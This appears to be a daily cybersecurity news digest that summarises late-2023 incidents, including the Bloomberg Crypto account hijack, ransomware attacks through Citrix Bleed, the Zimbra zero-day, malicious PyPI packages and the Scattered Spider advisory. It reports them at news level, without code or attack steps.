Daily Brief

The official Bloomberg Crypto Twitter account was hijacked to promote a phishing attack, redirecting users to a fake Discord server. A scammer used Bloomberg's old Telegram username to lure users into joining the counterfeit Bloomberg Discord with over 33,000 members. The fake Discord server used a bot to direct users to a phishing website designed to steal Discord credentials. The phishing site, disguised as a Discord verification service, attempted to capture login details by mimicking the legitimate AltDentifier bot. The malicious link was posted on the Bloomberg Crypto Twitter account and remained active for a brief period before being taken down. Threat actors target crypto community servers on Discord to gain access to accounts and promote scams, potentially leading to cryptocurrency theft. Bloomberg has not made an official statement and was not immediately available for comment regarding the incident.

Ransomware groups are targeting exposed Citrix Netscaler devices using the Citrix Bleed exploit (CVE-2023-4966) to infiltrate organizations, steal data, and encrypt files. Victims of these ransomware attacks include big names such as Toyota Financial Services, ICBC, DP World, Allen & Overy, and Boeing. LockBit and Medusa ransomware gangs, among others, are utilizing the vulnerability, with Medusa increasing its presence with a new blog for data leaks. Despite attacks dropping by 15.12% in October, there was still a significant 54.67% year-on-year increase in ransomware victims. The BlackCat ransomware gang went a step further by filing an SEC complaint against a company for not disclosing a cyberattack, a tactic which may see more use in ransomware extortion. The FBI and CISA have been active in issuing warnings about various ransomware threats, including Royal, Rhysida, and the Scattered Spider hacker collective. Ransomware attacks caused disruptions at major institutions such as the British Library and Toronto Public Library, highlighting the broad reach of these threats.

The official Twitter account for Bloomberg Crypto was compromised to redirect users to a phishing site. Attackers set up a fake Telegram channel and Discord server to lure victims into providing Discord credentials. The fake Discord server used a bot to prompt verification through a phishing website masquerading as AltDentifier. Victims were given 30 minutes to 'verify' their account on the bogus website to gain full server access. The phishing link aimed to steal Discord login details under the guise of server security measures. The malicious link was identified and removed within 30 minutes after a crypto fraud investigator reported it. Such phishing attacks on crypto communities are common, with scammers seeking to steal cryptocurrency assets. Bloomberg has not yet commented on the situation publicly.

LockBit ransomware group's leadership adjusts negotiation tactics due to affiliates' unsatisfactory ransom collection rates. The group experienced a decrease in ransom payments, citing less-experienced affiliates offering undue discounts and inconsistent negotiation outcomes. LockBit now enforces standardized guidelines on setting initial ransom amounts based on victim's annual revenue and limits discounts to a maximum of 50%. Affiliates previously had autonomy in negotiations, leading to victims refusing payment after observing the potential for steep discounts. Incident responders are documenting negotiation behaviors, which influences victims' decisions to reject payment offers if they perceive a lack of fairness. LockBit issued a survey prior to implementing new rules to guide all future negotiations with victims starting October 1, 2023. Security analysts emphasize the importance of monitoring ransomware group tactics as every negotiation carries unique aspects due to the affiliate-driven organizational structure.

Yamaha Motor's Philippines subsidiary experienced a ransomware attack, leading to the unauthorized access and partial leak of employee data. External security experts were engaged immediately after the incident was detected on October 25 to investigate and mitigate damage. While limited to a single server at Yamaha Motor Philippines, there has been no reported impact on the headquarters or other group subsidiaries. The incident was reported to Philippine authorities, and efforts are underway to determine the full impact of the attack. INC RANSOM gang has claimed responsibility for the breach, posting allegedly stolen data, around 37GB, on a dark web leak site. INC RANSOM, known for double extortion attacks since August 2023, typically breaches networks via spearphishing or exploiting vulnerabilities like Citrix NetScaler CVE-2023-3519. The threat actors engage in lateral movement within the network, data theft, and encryption of systems, followed by demanding ransom in return for decryption and other assurances. Victims face a 72-hour ultimatum to start negotiations, with the risk of public data disclosure if they refuse to comply with the ransom demands.

Google's Threat Analysis Group (TAG) identified a zero-day vulnerability in Zimbra Collaboration email server used to compromise government systems. Hackers exploited the flaw, CVE-2023-37580, to steal emails, credentials, and authentication tokens from government entities in various countries. The vulnerability, an XSS issue, was exploited by at least four separate threat actors beginning on June 29. Attackers managed to auto-forward emails and lead victims to phishing pages before an official patch was released by Zimbra. Google alerted Zimbra to the active security breaches, prompting the release of an emergency hotfix, later followed by an official patch. The report highlights the significance of timely security updates and the risks posed even by medium-severity vulnerabilities. Multiple similar XSS vulnerabilities have been used to attack mail servers in the past, underlining a pattern of exploiting email platforms for cyber espionage.

SonicWall, a cybersecurity firm, has acquired Solutions Granted, a Virginia-based Managed Security Service Provider (MSSP). The acquisition aims to meet customer demand for managed detection and response (MDR) and extended detection and response (XDR) services. SonicWall is now poised to offer U.S.-based Security Operations Center (SOC)-as-a-service for the first time. Solutions Granted's integration will provide capabilities in endpoint, cloud management, vulnerability assessment, and proven success in the managed security space. CEO Bob VanKirk emphasized the acquisition's crucial role in SonicWall's growth strategy and the importance of enhancing support for their partners in the cybersecurity market. All employees of Solutions Granted will join SonicWall post-acquisition, maintaining team integrity which both companies view as essential. SonicWall plans to develop an EU-based SOC to better address European partner needs while considering multiple factors such as language support and timezone coverage.

The U.S. Cybersecurity & Infrastructure Security Agency (CISA) warns of new exploits targeting vulnerabilities in Microsoft, Sophos, and Oracle products. CISA has updated its Known Exploited Vulnerabilities catalog to include these actively exploited flaws, emphasizing the need for prompt action. Federal agencies are advised to apply security updates before December 7 to mitigate the risks associated with these vulnerabilities. CVE-2023-36584, a vulnerability within Microsoft systems, was addressed in the October 2023 Patch Tuesday updates but was not initially marked as actively exploited. A critical bug in Sophos Web Appliance, identified as CVE-2023-1671 and with a 9.8 severity score, allows for remote code execution on outdated software versions. Sophos Web Appliance is no longer supported since July 20, and customers are urged to switch to Sophos Firewall for continued web protection. While CISA's KEV catalog targets U.S. federal agencies, it also acts as a global alarm for companies to secure their systems against these vulnerabilities.

The British Library has confirmed a ransomware attack causing significant ongoing service outages. Over 11 million yearly online visitors and 16,000 daily users of its collections are affected by the outage. The library's massive collection and the addition of 3 million new items annually underscore the scale of the impact. Details on the specific ransomware operation involved or the extent of data compromise have not been disclosed. The incident has led to an ongoing forensic investigation supported by the National Cyber Security Centre and other authorities. Despite the attack, public events continue as planned, and temporary passes for onsite services are being issued. The Business & IP Centre is open to support businesses, though some digital services are unavailable.

Cybercriminals are using fake Google ads to trick users into downloading malware disguised as the WinSCP software. Security firm Securonix has identified the campaign and named it SEO#LURKER. Victims are redirected from a promoted ad to a compromised WordPress site, then to a malicious phishing site. A referrer check determines whether victims get the malware payload or are redirected to a Rick Astley video on YouTube. The malware is delivered in a ZIP file and uses DLL side-loading to execute and maintain persistence on the host system. Python scripts delivered with the malware establish a backdoor for further exploitation and system enumeration. The campaign appears to primarily target users in the U.S. seeking to download WinSCP, using geoblocking to direct the attacks. Malvertising is an increasing threat, with similar malicious campaigns distributing various types of malware and engaging in credit card skimming.

The FCC is enforcing new regulations to protect consumers against SIM swapping and port-out fraud. These scams involve unauthorized SIM changes and number porting, putting personal data and accounts at risk. Providers must now use secure authentication before transferring numbers and immediately notify customers of SIM or port-out requests. SIM swapping has been utilized by cybercriminals to bypass two-factor authentication and hijack online accounts. FCC Commissioner Geoffrey Starks emphasizes the necessity for secure verification and privacy from wireless carriers. In response to these threats, the FCC is investigating how AI might both combat and exacerbate robocalls and robotexts.

The webinar focuses on cloud security, addressing emerging threats such as Zenbleed, Kubernetes attacks, and sophisticated Advanced Persistent Threats (APTs). Led by Jose Hernandez from Lacework Labs, the session offers practical strategies to protect cloud infrastructures. The session is geared toward IT professionals at all levels, providing strategic guidance and actionable insights. The collaboration between The Hacker News and Lacework Labs seeks to empower organizations with expert knowledge on cloud security. Participants are encouraged to register for the webinar to gain the latest information and techniques to safeguard their cloud environment. The webinar highlights the importance of continuous learning and adaptation in the rapidly evolving landscape of cloud security.

An unknown attacker utilized PyPI to distribute 27 malware-laden packages posing as popular Python libraries. The malicious packages employed steganography to hide harmful payloads within image files, enhancing the attack's stealth. Download figures for these packages are in the thousands, with majority originating from countries including the U.S., China, and Germany. The malware aims to establish persistence, steal sensitive data, and access cryptocurrency wallets. Two specific packages, pystob and pywool, are noted for exfiltrating stolen data to a Discord webhook and seeking persistence via a VBS file in the Windows startup folder. ReversingLabs reports protestware npm packages spreading political messages depending on the geographic location of the host. GitGuardian identified numerous secrets (API keys, SSH keys, etc.) exposed in PyPI projects, heightening the risk of unauthorized access or social engineering attacks. In response to the increasing threat, the U.S. government, including CISA, NSA, and ODNI, has issued new guidance for software developers to mitigate software supply chain risks.

U.S. cybersecurity and intelligence agencies have issued a warning about a cybercriminal group known as Scattered Spider. Scattered Spider utilizes sophisticated social engineering, such as phishing and SIM swapping, to steal data and bypass multi-factor authentication. The group employs BlackCat/ALPHV ransomware and a variety of remote access tools and malware like AveMaria, Raccoon Stealer, and Vidar Stealer. Microsoft considers Scattered Spider one of the most dangerous financial criminal groups, and the FBI is aware of the identities of some members. The group is part of the Gen Z cybercrime ecosystem called the Com, which has engaged in swatting attacks and other violent activities. Scattered Spider has been observed monitoring incident response efforts to adapt to defense measures and maintain access. The U.S. government advises the implementation of phishing-resistant multi-factor authentication and robust incident recovery strategies to mitigate such threats.

Samsung Electronics UK has informed customers of a data breach affecting purchases made from July 1, 2019, to June 30, 2020. An unauthorized individual exploited a third-party application vulnerability, leading to the exposure of names, phone numbers, and addresses. This incident marks the third major data breach for Samsung globally in the past two years. The breach follows a serious incident in March 2022, where nearly 200GB of internal Samsung data was leaked by extortion group Lapsus$. Another breach occurred in the US in July 2022, with customer names, contact information, and product registration details compromised. Following these security incidents, a class action lawsuit was filed against Samsung, claiming the company collects and inadequately protects personal data. The lawsuit highlights customers being coerced into sharing data to maintain functionality of Samsung products, such as TVs and printers. Samsung has not provided a comment on the situation at the time of reporting.